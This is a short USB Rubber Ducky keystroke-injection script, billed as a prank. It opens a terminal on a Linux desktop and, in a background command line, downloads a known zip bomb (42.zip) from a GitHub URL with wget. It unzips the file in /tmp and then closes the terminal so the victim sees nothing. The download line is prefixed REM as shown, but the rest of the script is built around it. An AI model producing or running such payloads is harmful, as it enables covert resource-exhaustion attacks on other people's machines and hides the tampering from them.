REM Title: Zip bomb tux style
REM Author: FalsePhilosopher
REM Target:  Unix-like tested on kubuntu 22.04
REM Props: Hak5, strippers and memes
REM Version: 1.0
REM Category: Prank
REM zipbomb I found and thought I would have some fun with. Opens a background download/unzip, and closes the terminal for no visual evidence.
DELAY 300
REM Minimize all windows as that ensures launch happens smoother and when the terminal is launched everything else is relaunched for no trace of funny business.
WINDOWS d
DELAY 300
CTRL-ALT t
DELAY 1500
REM FIRE IN THE HOLE!
REM STRING cd /tmp/ && nohup wget -q https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Ducky/USBRubberducky/library/prank/Unix-like/Linux/Bombs/zip_bomb/42.zip 2>/dev/null && unzip 42.zip 2>/dev/null & disown
ENTER
DELAY 500
ALT F4
